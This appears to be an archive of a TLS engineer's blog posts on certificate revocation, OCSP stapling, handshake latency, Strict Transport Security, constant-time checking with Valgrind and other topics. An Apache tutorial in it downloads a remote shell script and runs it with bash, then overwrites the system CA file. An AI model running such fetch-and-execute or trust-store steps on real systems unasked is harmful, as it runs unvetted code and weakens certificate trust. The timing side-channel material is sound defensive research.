OCSP and CRLs are both methods of dealing with certificate revocation: what to do when you lose control of your private key. The certificates themselves contain the details of how to check if they have been revoked.

OCSP is a protocol for asking the issuing authority “What's the status of this certificate?” and a CRL is a list of certificates which have been revoked by the issuing authority. Both are fetched over HTTP and a certificate can specify an OCSP URL, a CRL URL, or both. But certificate authorities will typically use at least OCSP.

Firefox 2 and IE on Windows XP won't block an SSL/TLS handshake for either revocation method. IE on Vista will block for OCSP, as will Firefox 3. Since there can be several OCSP requests resulting from a handshake (one for each certificate), and because OCSP responders can be slow, this can result in hundreds of milliseconds of additional latency for the first connection. I don't have really good data yet, but hopefully soon.

The answer to this is OCSP stapling: the SSL/TLS server includes the OCSP response in the handshake. OCSP responses are public and typically last for a week, so the server can do the work of fetching them and reuse the response for many connections. The latest alpha of Apache supports this (httpd 2.3.6-alpha). Google is currently rolling out support.

However, OCSP stapling has several issues. Firstly, the protocol only allows the server to staple one response into the handshake: so if you have more than one certificate in the chain the client will probably end up doing an OCSP check anyway. Secondly, an OCSP response is about 1K of data. Remember the issue with overflowing the initcwnd with large certificates? Well the OCSP response is included in the same part of the handshake, so it puts even more pressure on certificate sizes.

Google's SSL/TLS work

Google is working on a number of fronts here. I'll deal with them in order of deployment and complexity.

Firstly we have False Start. All you really need to know is that it reduces the number of round trips for a full handshake from two to one. Thus, there's no longer any latency advantage to resuming. It's a client-side change which should be live in Chrome 8 and is already in some builds of Android Froyo.

Secondly, Chrome will soon have OCSP preloading. This involves predicting the certificates that a server will use based on past experience and starting the OCSP lookups concurrently with the DNS resolution and TCP connection.

Slightly more complex, but deployed, is Next Protocol Negotiation. This pushes negotiation of the application level protocol down into the TLS handshake. It's how we trigger the use of SPDY. It's live on the Google frontend servers and in Chrome (6).

Lastly, and most complex, is Snap Start. This reduces the round trip times to zero for both types of handshakes. It's a client and server side change and it assumes that the client has the server's certificate cached and has up-to-date OCSP information. However, since the certificate and OCSP responses are public information, we can cache them on disk for long periods of time.

Conclusion

I hope that was helpful. We want to make the web faster and more secure and this sort of communication helps keep the world abreast of what we're doing.

Also, don't forget that we recently deployed encrypted web search on https://encrypted.google.com. Switch your search engine!

(updated 26th Oct 2010: mentioned OpenSSL 1.0.0a now that it's released, updated the status of OCSP stapling and False Start and added a mention of OCSP preloading.)

curve25519 in iOS4

Someone pointed out to me that I'm in the credits for iOS4 (the operating system formerly known as iPhone OS) for curve25519-donna. Unfortunately, I have no idea what they're using it for! I would be fascinated to know.

Update: (2012-06-26) The use is described in this document from Apple.

TLS latency improvements

We've published several drafts recently concerning reducing the number of round trips in SSL/TLS. Firstly, False Start is a client-side only change which reduces the number of round trips for a full handshake to one. It's in Android Froyo and Chrome (Linux since 5.x, Mac and Windows since 6.x). Secondly, Snap Start is a client and server change which reduces the overhead to zero. The code for it is still preliminary, but it might make it into Chrome 6.x. Snap Start requires that the client cache some information about the server but, unlike resume information, that data can be cached on disk.

This is all part of an ongoing effort to make the web faster.

(Round trip times)
                Full handshake    Resume handshake
Standard TLS    2                 1
False Start     1                 1
Snap Start      0                 0
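As a sketch of what those numbers mean for a user, the following turns the table into a setup time. The enum and function names are invented for this example, and it assumes that the only other cost is the single round trip of the TCP handshake.

```c
#include <assert.h>

enum tls_mode { STANDARD_TLS, FALSE_START, SNAP_START };

/* Round trips spent in the TLS handshake before application data can
 * flow, taken from the table above. */
unsigned tls_round_trips(enum tls_mode mode, int resuming) {
  switch (mode) {
  case STANDARD_TLS:
    return resuming ? 1 : 2;
  case FALSE_START:
    return 1;
  case SNAP_START:
    return 0;
  }
  assert(0 && "unknown mode");
  return 0;
}

/* Time before the first request can be sent: one round trip for the TCP
 * handshake plus the TLS round trips. */
unsigned setup_latency_ms(enum tls_mode mode, int resuming, unsigned rtt_ms) {
  return (1 + tls_round_trips(mode, resuming)) * rtt_ms;
}
```

On a 100ms path, a full standard handshake means 300ms before the first request leaves, False Start brings that to 200ms and Snap Start to 100ms, which is the same as plain HTTP.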

Speaking at Velocity

O'Reilly Velocity Conference 2010

I'll be presenting various SSL/TLS work at the O'Reilly Velocity Conference in June. Specifically, 2:30pm on Thursday the 24th of June.

You can also see the outline of the talk here, although wtc, ngm and I have yet to nail down the precise contents.

WOFF support in Chromium

Last week I added WOFF support to Chromium. It's currently on trunk and hopefully will be included in a dev channel release by the end of this week.

WOFF is a repackaging of the old sfnt/TrueType/OpenType format. Conceptually it's just a gzipped TTF file with optional sections for a chunk of XML and a chunk of 'private data'. Since TrueType is a table based format already, those two optional sections could have been included as tables. And since we have gzip as a transport encoding in all reasonable HTTP servers, that's a little pointless too.

So, technically, there's no need for WOFF to exist at all. It's all politics. The type foundries didn't want a format which people could use on their computers. Of course, it's trivial to convert them (Chromium does it internally), but if it gets the foundries and Microsoft on board, then it's worthwhile.

But I do worry that WOFF will actually make web sites look worse. All the samples and examples that I've seen (even the nice ones) are terribly hinted. I assume that this is because the people doing them are using Macs, which traditionally don't hint anyway. But I prefer strong hinting and, in this mode, the free fonts look blotchy. They just haven't had the time and effort put in that my system fonts (often msttcorefonts) have had.

So I can always tell when a site is using @font-face, because it looks bad. Which is rather a shame given the intention.

Checking that functions are constant time with Valgrind

Information leaks via timing side channels can be deadly. You can steal RSA keys from other processes on the same host, extract the kernel's dm_crypt keys and steal AES keys over the network.

In order for a function to be constant time, the branches taken and memory addresses accessed must be independent of any secret inputs. (That's assuming that the fundamental processor instructions are constant time, but that's true for all sane CPUs.)

However, it's tough to write constant time functions. You can see the source to a few simple ones that I wrote in Go. Sometimes the design of the function is fundamentally flawed (like AES), but even when the function can be efficiently implemented in a constant time fashion, it's easy to slip up. Careful code review is currently the best practice but it's error prone as the amount of code increases and fragile in the face of change.

A type system could probably help here, but that's not the path I'm taking today. Since cryptographic functions result in abnormally straight line code, it's common for a typical input to exercise every instruction. So a tool like Valgrind could check all the branches and memory accesses to make sure that they haven't been tainted with secret data.

This would mean keeping track of every bit in memory to know if it's secret or not, likewise for all the CPU registers. Preferably at the bit level. The tool would also have to know that adding secret and non-secret data results in secret data etc. That suggests that it would be quite a complex tool.

But memcheck already does this! In order to keep track of uninitialised data it shadows every bit of memory and will warn you if you use uninitialised data in a branch or to index a memory access. So if we could tell memcheck to treat our secret data as uninitialised, everything should just work.

I have a Valgrind patch that does just that (against SVN r11097). It will intercept any calls to ct_poison and ct_unpoison in libctgrind.so*.

Let's look at a bad way to test a 128-bit MAC against a calculated value:

char check16_bad(unsigned char *a, unsigned char *b) {
  unsigned i;
  for (i = 0; i < 16; i++) {
    if (a[i] != b[i])
      return 0;
  }

  return 1;
}

And now, testing it with memcheck/ctgrind:

int
main() {
  unsigned char a[16], b[16];

  memset(a, 42, sizeof(a));
  memset(b, 42, sizeof(b));

  ct_poison(a, sizeof(a));

  printf("check16_bad\n");
  check16_bad(a, b);

  return 0;
}

$ /home/agl/devel/valgrind/vg-in-place ./a.out
...
check16_bad
==30993== Conditional jump or move depends on uninitialised value(s)
==30993==    at 0x40067F: check16_bad (test.c:11)
==30993==    by 0x40075F: main (test.c:44)

It seems to work! There are a few other tests in test.c which show the correct way to implement that function as well as a demo to show that secret dependent memory accesses are also caught by this tool.
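For reference, here's a sketch of one common way to write that comparison without a secret dependent branch. This is my illustration of the general technique and isn't necessarily identical to the version in test.c; the name check16_good is assumed.

```c
#include <assert.h>
#include <stddef.h>

/* Returns 1 if the two 16-byte buffers are equal and 0 otherwise. Every
 * byte is always examined, so no branch depends on the contents. */
char check16_good(const unsigned char *a, const unsigned char *b) {
  unsigned char diff = 0;
  unsigned i;

  assert(a != NULL && b != NULL);
  for (i = 0; i < 16; i++)
    diff |= a[i] ^ b[i];

  /* diff is zero iff every byte matched. Subtracting one from zero wraps
   * around and sets the bits above the low eight, so this maps 0 to 1 and
   * anything else to 0 without branching. */
  return (char)(1 & (((unsigned)diff - 1) >> 8));
}
```

The differences are accumulated with OR and only collapsed to a result at the very end. A compiler is, in principle, free to turn this back into something with a branch, which is exactly why it's worth checking the compiled code with a tool rather than trusting the source.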

We can test a few other things too. It confirms that donna-c64 is constant time, which is nice. I also tested BN_mod_exp_mont_consttime from OpenSSL since that's a large function which calls functions from several other files.

It turns out not to be constant time! There's a secret dependent memory access:

==31076== Use of uninitialised value of size 8
==31076==    at 0x402210: MOD_EXP_CTIME_COPY_FROM_PREBUF (bn_exp.c:554)
==31076==    by 0x40277B: BN_mod_exp_mont_consttime (bn_exp.c:703)
==31076==    by 0x4011FF: main (ossl.c:24)

From inspection of the code, this appears to be a true positive. To be fair, the comment above the function suggests that it's rather misnamed:

/* This variant of BN_mod_exp_mont() uses fixed windows and the special
 * precomputation memory layout to limit data-dependency to a minimum
 * to protect secret exponents

It only claims to "limit" the side-channel leaks. I don't know how serious this is, but then you never do till someone gets a paper published by stealing all your secrets.
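To show what avoiding a secret dependent memory access looks like in general, here's a sketch of a table lookup that reads every entry and uses a mask to keep only the wanted one. It isn't OpenSSL's code or a proposed fix for it; ct_lookup is a name I've made up and the table of 32-bit words is just for illustration.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>

/* Returns table[secret_idx] (or 0 if secret_idx is out of range) while
 * reading every entry, so the addresses touched don't depend on
 * secret_idx. */
uint32_t ct_lookup(const uint32_t *table, size_t n, size_t secret_idx) {
  uint32_t result = 0;
  size_t i;

  assert(table != NULL);
  for (i = 0; i < n; i++) {
    /* x is zero only when i == secret_idx. */
    size_t x = i ^ secret_idx;
    /* The top bit of (x | -x) is set exactly when x is non-zero. */
    size_t nonzero = (x | ((size_t)0 - x)) >> (sizeof(size_t) * CHAR_BIT - 1);
    /* mask is all ones for the wanted entry and zero for the rest. */
    uint32_t mask = (uint32_t)nonzero - 1;

    result |= table[i] & mask;
  }

  return result;
}
```

The cost is that a lookup is now linear in the size of the table, which is why real implementations go to some lengths with memory layouts to limit the damage.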

Time to update OpenSSL 0.9.8m

If you're using OpenSSL 0.9.8m as either a client or server (but esp as a server) then it's time to update to 0.9.8n.

OpenSSL Security Advisory [24 March 2010]

"Record of death" vulnerability in OpenSSL 0.9.8f through 0.9.8m
================================================================

In TLS connections, certain incorrectly formatted records can cause an OpenSSL
client or server to crash due to a read attempt at NULL.

Affected versions depend on the C compiler used with OpenSSL:

- If 'short' is a 16-bit integer, this issue applies only to OpenSSL 0.9.8m.
- Otherwise, this issue applies to OpenSSL 0.9.8f through 0.9.8m.

Users of OpenSSL should update to the OpenSSL 0.9.8n release, which contains a
patch to correct this issue.  If upgrading is not immediately possible, the
source code patch provided in this advisory should be applied.

Bodo Moeller and Adam Langley (Google) have identified the vulnerability
and prepared the fix.

Macs everywhere

The Setup is a neat site. They find (somewhat) famous techie people and interview them about what hardware and software they use. I was browsing through it because I recognised some of the names, and because it's always neat to find out about tools that you don't use.

But it struck me how many people were using OS X as their primary, day to day, operating system. So I went through every one of them and added up the numbers (except Why the Lucky Stiff, because they put an underscore at the start of the domain name; stopping it from resolving).

Windows: 3.5, Linux: 3, Mac: 29.5

These folks aren't all hardcore coders to be sure, but one of the Linux users is RMS and I'm not sure he counts! It would be like asking Steve Jobs what he uses.

But gosh, that's a total OS X domination.

Strict Transport Security

Chrome 4 went stable yesterday. One of the many new things in this release is the addition of Strict Transport Security. STS allows a site to request that it always be contacted over HTTPS. So far, only Chrome supports it. However, the popular NoScript Firefox extension also supports it and hopefully support will appear in Firefox proper at some point.

The issue that STS addresses is that users tend to type http:// at best, and omit the scheme entirely most of the time. In the latter case, browsers will insert http:// for them.

However, HTTP is insecure. An attacker can grab that connection, manipulate it and only the most eagle eyed users might notice that it redirected to https://www.bank0famerica.com or some such. From then on, the user is under the control of the attacker, who can intercept passwords etc at will.

An STS enabled server can include the following header in an HTTPS reply:

Strict-Transport-Security: max-age=16070400; includeSubDomains

When the browser sees this, it will remember, for the given number of seconds, that the current domain should only be contacted over HTTPS. In the future, if the user types http:// or omits the scheme, HTTPS is the default. In fact, all requests for URLs in the current domain will be redirected to HTTPS. (So you have to make sure that you can serve them all!)
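Here's a rough sketch of how a client might pull the two directives out of that header value. It isn't Chrome's parser: the struct and function names are assumptions, matching is case-sensitive for brevity and unknown directives are simply skipped.

```c
#include <assert.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

struct sts_policy {
  unsigned long max_age;  /* seconds */
  int include_subdomains; /* 1 if includeSubDomains was present */
};

/* Parses a value such as "max-age=16070400; includeSubDomains". Returns 1
 * on success and 0 if max-age is missing or malformed. */
int parse_sts(const char *value, struct sts_policy *out) {
  const char *p = value;
  int have_max_age = 0;

  assert(value != NULL && out != NULL);
  out->max_age = 0;
  out->include_subdomains = 0;

  while (*p != '\0') {
    const char *end;
    size_t len;

    /* Skip separators and leading whitespace. */
    while (*p == ';' || isspace((unsigned char)*p))
      p++;
    end = p + strcspn(p, ";");
    len = (size_t)(end - p);
    /* Ignore trailing whitespace in this directive. */
    while (len > 0 && isspace((unsigned char)p[len - 1]))
      len--;

    if (len > 8 && strncmp(p, "max-age=", 8) == 0) {
      char *digits_end;

      if (!isdigit((unsigned char)p[8]))
        return 0;
      out->max_age = strtoul(p + 8, &digits_end, 10);
      if (digits_end != p + len)
        return 0;
      have_max_age = 1;
    } else if (len == 17 && strncmp(p, "includeSubDomains", 17) == 0) {
      out->include_subdomains = 1;
    }
    p = end;
  }

  return have_max_age;
}
```

For the header above this yields a max_age of 16070400 seconds (186 days) with include_subdomains set.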

For more details, see the specification.

There is still a window where a user who has a fresh install, or who wipes out their local state, is vulnerable. Because of that, we'll be starting a "Preloaded STS" list. These domains will be configured for STS out of the box. In the beginning, this will be hardcoded into the binary. As it (hopefully) grows, it can change into a list that is shared across browsers, like the safe-browsing database is today.

If you own a site that you would like to see included in the preloaded STS list, contact me at .

Setting up Apache with OCSP stapling

OCSP is the Online Certificate Status Protocol. It's a way for TLS clients to check if a certificate has been revoked. A certificate with OCSP enabled includes a URL to which a client can send a POST request and receive a signed statement that a given certificate is still valid.

This adds quite a bit of latency to the TLS connection setup as the client has to perform a DNS lookup on the OCSP server hostname, create an HTTP connection and perform the request-response transaction.

OCSP stapling allows the TLS server to include a recent OCSP response in the TLS handshake so that the client doesn't have to perform its own check. This also reduces load on the OCSP server.

Apache recently got support for OCSP stapling and this post details how to set it up.

1. Prerequisites

Apache support got added in this revision. At the time of writing, no release of Apache includes this so we get it from SVN below.

OpenSSL support was added in 0.9.8h. The version in Ubuntu Karmic is not recent enough, so I pulled the packages from lucid for this:

cd /tmp
wget 'http://mirrors.kernel.org/ubuntu/pool/main/o/openssl/openssl_0.9.8k-7ubuntu3_amd64.deb'
wget 'http://mirrors.kernel.org/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8k-7ubuntu3_amd64.deb'
wget 'http://mirrors.kernel.org/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8k-7ubuntu3_amd64.deb'

sudo dpkg -i openssl_0.9.8k-7ubuntu3_amd64.deb libssl0.9.8_0.9.8k-7ubuntu3_amd64.deb  libssl-dev_0.9.8k-7ubuntu3_amd64.deb

2. Building Apache

As noted, we need the SVN version of Apache at the time of writing. I'll be using some paths in the following that you should change (like /home/agl/local/ocsp):

svn checkout http://svn.apache.org/repos/asf/httpd/httpd/trunk httpd
cd httpd
svn co http://svn.apache.org/repos/asf/apr/apr/trunk srclib/apr
./buildconf
cd srclib/apr
./configure --prefix=/home/agl/local/ocsp

At this point, I had to patch APR in order to get it to build. I suspect this build break will be fixed in short order but, for the sake of completeness, here's the patch that I applied:

--- poll/unix/pollset.c (revision 892677)
+++ poll/unix/pollset.c (working copy)
@@ -129,6 +129,8 @@
 
 static apr_status_t close_wakeup_pipe(apr_pollset_t *pollset)
 {
+    apr_status_t rv0, rv1;
+
     /* Close both sides of the wakeup pipe */
     if (pollset->wakeup_pipe[0]) {
     rv0 = apr_file_close(pollset->wakeup_pipe[0]);

Now we can build and install Apache itself. Since we are giving a prefix option, this doesn't conflict with any system installs.

cd ../..
./configure --prefix=/home/agl/local/ocsp --with-apr=/home/agl/local/ocsp --enable-ssl --enable-socache-dbm

Again, for the sake of completeness, I'll mention that Apache SVN had a bug at the time of writing that will stop OCSP stapling from working:

--- modules/ssl/ssl_util_stapling.c     (revision 892677)
+++ modules/ssl/ssl_util_stapling.c     (working copy)
@@ -414,6 +414,10 @@
        goto done;
    }

+    if (uri.port == 0) {
+        uri.port = APR_URI_HTTP_DEFAULT_PORT;
+    }
+
    *prsp = modssl_dispatch_ocsp_request(&uri, mctx->stapling_responder_timeout,
                                         req, conn, vpool);

Then build and install it...

make -j4
make install

3. Generating certs

For this example, I'll be generating a CA cert, a server cert and an OCSP responder cert for that CA. In the real world you'll probably be getting the certs from a true CA, so you can skip this step.

cd /home/agl/local/ocsp
mkdir certs && cd certs
wget 'https://fedorahosted.org/pkinit-nss/browser/doc/openssl/make-certs.sh?format=txt'
mv make-certs.sh\?format=txt make-certs.sh
/bin/bash ./make-certs.sh europa.sfo.corp.google.com test@example.com all ocsp:http://europa.sfo.corp.google.com/
cat ocsp.crt ocsp.key > ocsp.pem

Now I'm going to add the CA that was just generated to the CA set. Firstly, Chromium uses an NSS database in your home directory:

certutil -d sql:/home/agl/.pki/nssdb -A -n testCA -i ~/local/ocsp/certs/ca.crt -t Cu,,

OpenSSL uses a file of PEM certs:

cd /etc/ssl
cp cert.pem cert.pem.orig
rm cert.pem
cat cert.pem.orig /home/agl/local/ocsp/certs/ca.crt > cert.pem

4. Running the responder

In the real world, the OCSP responder is run by the CA that you got your certificate from. But here I'm going to be running my own since I generated a new CA in section 3.

cd ~/local/ocsp
touch index.txt
sudo openssl ocsp -index index.txt -port 80 -rsigner certs/ca.pem -CA certs/ca.pem

5. Configuring Apache

I won't cover the basics of configuring Apache here. There are plenty of documents on the web about that. I'll just note that I have Apache only listening on port 443 since my OCSP responder is running on 80.

The config that you'll need is roughly this:

SSLStaplingCache dbm:/tmp/staples
SSLCACertificateFile "/etc/ssl/cert.pem"
SSLUseStapling on

(You probably want to choose a better location for the cache.)

Apache will parse its server certificate on startup and extract the OCSP responder URL. It needs to find the CA certificate in order to validate OCSP responses and that's why the SSLCACertificateFile directive is there (and why we added the CA to that file in section 3).

After restarting Apache, look in the error.log. What you don't want to see is the following:

[Sun Dec 20 17:24:28 2009] [error] ssl_stapling_init_cert: Can't retrieve issuer certificate!
[Sun Dec 20 17:24:28 2009] [error] Unable to configure server certificate for stapling

That means that Apache couldn't find the CA cert.

There are other directives, but they are currently undocumented. Your best bet is to look at the original Apache bug and the commit itself.

Chrome Linux Beta

Life goals: get a comic published. Check.

Digital Economy Bill

Cory Doctorow seems to have crafted the lexicon of the opposition to the Digital Economy Bill with his phrase ‘Pirate Finder General’ [1]. In his follow up he claims that this bill will introduce three-strikes, ISP spying and powers for Peter Mandelson to rewrite copyright law at will.

I spent a fun-filled Sunday afternoon reading the bill to see how bad it really is so that you don't have to (although you still should). You're welcome.

Firstly, the changes to copyright law are only a small part of the bill. Other parts of the bill cover: Channel 4 and Channel 3 licensing, removing the requirements for Teletext, digital switch over, radio licenses and classification of video games. I won't be talking about those in this post.

The bill requires that ISPs pass on infringement notices to subscribers, either via email or via the postal system. Copyright owners can also request infringement lists. This allows them to see that their notices A, B, C all went to the same subscriber. They can then take this information to court and proceed with the usual actions. (124A and 124B.)

The bill defers much of the policy in this area to a code that is to be written by OFCOM with the approval of the Secretary of State. This code includes the number of infringement notices that a single subscriber needs in order to be included in a report, the size of fines to be imposed on ISPs for failing to follow the code and the appeals process. The Secretary of State sets the compensation paid from copyright holders to ISPs and from everyone to OFCOM (124L).

What isn't in the bill is any talk of disconnection, ISP spying or three strikes. However, 124H gives the Secretary of State the power to require any “technical obligation”.

(3) A "technical measure" is a measure that (a) limits the speed or other capacity of the service provided to a subscriber; (b) prevents a subscriber from using the service to gain access to particular material, or limits such use; (c) suspends the service provided to a subscriber; or (d) limits the service provided to a subscriber in another way.

A brief interlude about statutory instruments is needed here. SIs are published by the government and cannot be amended by Parliament. There are two types. The first takes effect automatically and Parliament has a short time (usually 40 days depending on holidays etc) to annul it. The second requires positive action by both Houses before it takes effect.

According to Wikipedia, the last time that an SI was annulled was in 2000, and 1979 before that. The last time that an SI wasn't approved was 40 years ago.

The powers to impose technical measures are of the annul variety: they take effect automatically after 40 days. They don't appear to include requiring ISPs to spy.

After that power, 302A gives the Secretary of State the power to change the Copyright Act via a positive action SI “for the purpose of preventing or reducing the infringement of copyright by means of the internet”.

Next up, 124N gives the Secretary of State the power to take over any domain name registrar. By my reading, that is no exaggeration.

The Secretary can take action if they believe that the actions of a registrar affect “(a) the reputation or availability of electronic communications networks or electronic communications services [...] (b) the interests of consumers or members of the public [...].”. The action can either be to appoint a “manager”, who has total power, or to ask a court to change the constitution of the body and enjoin them from changing it back.

There's no requirement that this registrar be based in the UK, or even to allocate in the uk ccTLD.

Understandably, they are quite upset about this.

I'd also like to quickly note that this bill contains provisions for the licensing of orphan works without the copyright holder being involved, and also for libraries to have the rights to lend out e-books. (Although without giving any powers to do anything about technical limitations on e-books that might prevent it.)

Lastly, and I might be misunderstanding something here, on page 52 the Secretary of State seems to get powers to amend or annul anything relating to this act, in any bill in this session of Parliament, or before, by using a positive action SI.

Hopefully the above provides pointers for people who want to understand and read the bill. Now, my (informed) opining:

This is an abomination. It's an attempt to subvert Parliament by giving the government the power to write copyright law at will. The provisions are extraordinary. The sanctions against domain name registrars are staggering. I don't know of any other case when the government can sequestrate a private entity at will. Given the international nature of the domain name system, this should cause international concern.

I expect that this power is largely intended to be a very large stick with which to force the removal of xyzsucks.com style names that embarrass business or government. No registrar will dare cross their interests if they have this power.

If you vote in the UK, go to TheyWorkForYou, look up your MP, write a letter (on paper). Sign the petition. Support ORG.

Recent changes to SSL/TLS on the web

Most of the movement around TLS (aka SSL) currently involves people dealing with the renegotiation issues, but I'm going to sound a happier note today. TLS isn't static; things are changing for the better:

Strict transport security

My colleagues Dr Barth and Collin Jackson proposed ForceHTTPS some time ago. This has picked up Jeff Hodges, from PayPal, and morphed into Strict Transport Security. Dr Barth and I have implemented this in Chromium and Firefox supports it with the NoScript extension.

In short, you can add a header to your HTTPS replies like: Strict-Transport-Security: max-age=86400 and the browser will remember, for the next 86400 seconds (1 day), that the origin host should only be contacted over HTTPS. It also forbids mixed content.

(Update: Dr Barth points out that the limits on mixed content have been removed as the standard has advanced!)

Chrome dev channel releases already support this and it'll be in Chrome 4.0. The hosts are stored in a JSON file in the profile directory:

{
   "+7cOz6FDyMiPEjNtc0haTPwdZPbvbPFP2NyZIA82GTM=": {
      "expiry": 1258514505.715938,
      "include_subdomains": false
   }
}

If you try to navigate to an http:// URL when that host has STS enabled, the browser will internally rewrite it to https://. Suitable sites (banks etc) should start using this as soon as possible.
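The rewrite itself is simple. Here's a sketch of the two pieces, with the caveat that it works on plain hostnames (the stored file above holds hashes instead), ignores case and that both function names are made up for this example.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if `host` is covered by an STS entry for `sts_host`. */
int sts_covers(const char *host, const char *sts_host,
               int include_subdomains) {
  size_t hl, sl;

  assert(host != NULL && sts_host != NULL);
  if (strcmp(host, sts_host) == 0)
    return 1;
  if (!include_subdomains)
    return 0;

  hl = strlen(host);
  sl = strlen(sts_host);
  /* host must be a non-empty label, then ".", then sts_host. */
  return hl > sl + 1 && host[hl - sl - 1] == '.' &&
         strcmp(host + hl - sl, sts_host) == 0;
}

/* Writes the https:// form of an http:// URL into out. Returns 1 if the
 * URL was rewritten and 0 if it wasn't http:// or didn't fit. */
int upgrade_url(const char *url, char *out, size_t out_len) {
  static const char kHTTP[] = "http://";
  int n;

  assert(url != NULL && out != NULL);
  if (strncmp(url, kHTTP, sizeof(kHTTP) - 1) != 0)
    return 0;
  n = snprintf(out, out_len, "https://%s", url + sizeof(kHTTP) - 1);
  return n >= 0 && (size_t)n < out_len;
}
```

Note that the subdomain check requires a dot before the suffix, so an entry for example.com covers www.example.com but not badexample.com.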

Compression

Well, this certainly isn't new! OpenSSL has supported deflate compression on TLS connections for ages, but NSS (the SSL/TLS library used in all Mozilla based products for one) hasn't. This means that Firefox never supported compression, nor Thunderbird (and it's a fairly big deal for IMAP connections).

However, Wan Teh Chang and I have added deflate support to NSS and it'll be in the next release. Thanks to Nelson Bolyard for the code review.

Cut through

Here's a diagram of a TLS connection from the RFC:

Client                                               Server

      ClientHello                  -------->
                                                      ServerHello
                                                     Certificate*
                                               ServerKeyExchange*
                                              CertificateRequest*
                                   <--------      ServerHelloDone
      Certificate*
      ClientKeyExchange
      CertificateVerify*
      [ChangeCipherSpec]
      Finished                     -------->
                                               [ChangeCipherSpec]
                                   <--------             Finished
      Application Data             <------->     Application Data

This means that an HTTPS connection adds an extra two round trips on top of HTTP.

Nagendra Modadugu and myself (independently) came up with a “cut through” mode for TLS handshakes. Rather than wait for the server's Finished message, the client can send application data after only one round trip. This means that an attacker can perform a downgrade attack on the cipher and force the client to transmit with a weaker cipher than it might have normally used. However, an attacker cannot get the key so, as long as all the supported ciphers are strong enough, it all works out.

This cuts a round-trip time from a normal HTTPS handshake and should be appearing in Chromium and Android soon.

(Nelson Bolyard tells me that this isn't a novel idea, although it doesn't seem to have had much traction up til now.)

Next protocol negotiation

TLS over port 443 is the only clean channel that many hosts have these days. However, this means that the TCP destination port number can no longer be used to select an application level protocol since it's fixed by firewalls, proxies etc.

The specific use case for this would be SPDY, a new transport layer for HTTP. We want to know, before we send the first request, if the server supports SPDY.

draft-agl-tls-nextprotoneg describes an extension to let you do that. It's being tested in Chromium at the moment (although not yet in the public tree).

Go launch

I'm delighted to be a minor part of the Go launch today:

Go is an experimental language from Google that I've been coding in for the past month or so. It sits in a similar niche to Java: performant but garbage collected. However, it's vastly more enjoyable to code in than Java!

Thanks to a suite of compilers, it compiles to machine code very quickly. There's also a frontend to GCC in the works. It's runtime and type safe, concurrent, has a novel (for me, at least) take on object orientation and provides runtime reflections on types.

Personally, I think it gets a place in my list of favoured tools, which currently contains C, C++, Python and Haskell.

The TLS flaw that wasn't

There were many articles yesterday suggesting that a major new flaw in TLS (aka SSL) had been found ([1][2][3]). The last of those is a post by Ben Laurie, an expert in these matters, with a suitably hyperbolic title: “Another Protocol Bites The Dust”

Here's the issue: there's an extremely uncommon configuration of web servers where they're set up to require client side certificates for some URLs and not others. If a user has an HTTPS connection open that didn't handshake with a client side certificate and they try to access such a URL, the webserver will perform another handshake on the same connection. As soon as that handshake completes with the correct certificate, they'll run the request that was received before the connection was fully authenticated.

It's a bug in the web server. There was a misunderstanding between what the folks writing the webserver thought that TLS was providing and what it actually provides. One might also argue that it's a shortcoming in the HTTP protocol (there's no way for a server to ask a client to redo a request). One might also argue that TLS should provide the properties that the web servers expected.

But it's not a flaw in TLS. The TLS security properties are exactly what was intended.

Now, it appears that the fix will be to TLS. That's fine, but the place that gets ‘fixed’ isn't always the place that made the mistake.

I don't understand why knowledgeable folks like EKR and Laurie are so eager to attribute this problem to TLS.

Anti aliased clipping, a tale of woe

People have been complaining that rounded rectangles in Chrome aren't anti-aliased. If you're a web developer, it seems that this is a Big Deal.

The issue is that almost anything can have rounded corners in WebKit. There's no drawRoundedRectangle function; instead, clipping paths are created and then normal drawing proceeds. On Safari (which is also WebKit, but sitting on top of the CoreGraphics library), clipping to a path is anti-aliased and everything looks pretty. However, Chrome's graphics library, Skia, doesn't do anti-aliased clipping, and for a good reason.

Consider the figure below:

At the top left is an anti-aliased clipping region. The darker the pixel, the more is covered by the path. If we were to fill the region with green, we would get the image at the bottom left. When drawing, we consider how much of the clipping region covers each pixel and convert that to an alpha value. For a pixel which was half covered by the clipping region we would calculate 50% × background_color + 50% × green.

However, consider what happens when we first fill with red (top right) and then with green (bottom right). We would expect that the result would be the same as filling with green - the second fill should cover the first. But for pixels which are fractionally covered by clipping region, this isn't the case.

The first fill, with red, works correctly as detailed above. But when we come to do the second fill, the background_color isn't the original background color, but the slightly red color resulting from the first fill. Both CoreGraphics and Firefox's <canvas> have this bug.

It might seem trivial, but if you end up covering anti-aliased clipping regions multiple times you end up with unsightly borders around the clip paths. This is why Skia only supports 1-bit clip paths.
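The double-fill problem can be checked with a little arithmetic. The following is a minimal sketch, not Skia or CoreGraphics code: the `rgb` type and the function names are made up for illustration, and colours are plain doubles in the range 0 to 1.

```c
/* A colour with channels in [0, 1]. Hypothetical type for illustration. */
typedef struct { double r, g, b; } rgb;

/* Blend src over dst, weighted by how much of the pixel the clip covers. */
rgb blend(rgb dst, rgb src, double coverage) {
    rgb out;
    out.r = coverage * src.r + (1.0 - coverage) * dst.r;
    out.g = coverage * src.g + (1.0 - coverage) * dst.g;
    out.b = coverage * src.b + (1.0 - coverage) * dst.b;
    return out;
}

/* A single fill through the anti-aliased clip. */
rgb fill_once(rgb background, rgb colour, double coverage) {
    return blend(background, colour, coverage);
}

/*
 * Two fills through the same clip, each blended straight onto the bitmap.
 * The second blend sees the result of the first as its background, so
 * some of the first colour survives in partially covered pixels.
 */
rgb fill_twice(rgb background, rgb first, rgb second, double coverage) {
    rgb after_first = blend(background, first, coverage);
    return blend(after_first, second, coverage);
}
```

For a half-covered pixel on a black background, filling once with green leaves no red at all, while filling with red and then green leaves a quarter-strength red channel behind. That residue is the unsightly border.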

The correct way to do anti-aliased clipping is to draw to a layer, on top of the original bitmap, and, when the clipping path is popped from the clip stack, erase outside of the path (anti-aliased) and composite the result onto the underlying bitmap.

This works just fine; the problem is that <canvas> users don't always pop the clip stack. They expect to be able to set a clipping path, draw and have it appear without managing a stack. We could collapse the clipping stack for them when we paint to the screen, but then we need to restore it afterwards, which would require major surgery to Skia.

The second problem with anti-aliasing, even when done correctly, is that it makes it impossible to put polygons next to each other. Try this demo in Firefox and note the hairlines caused by anti-aliasing.

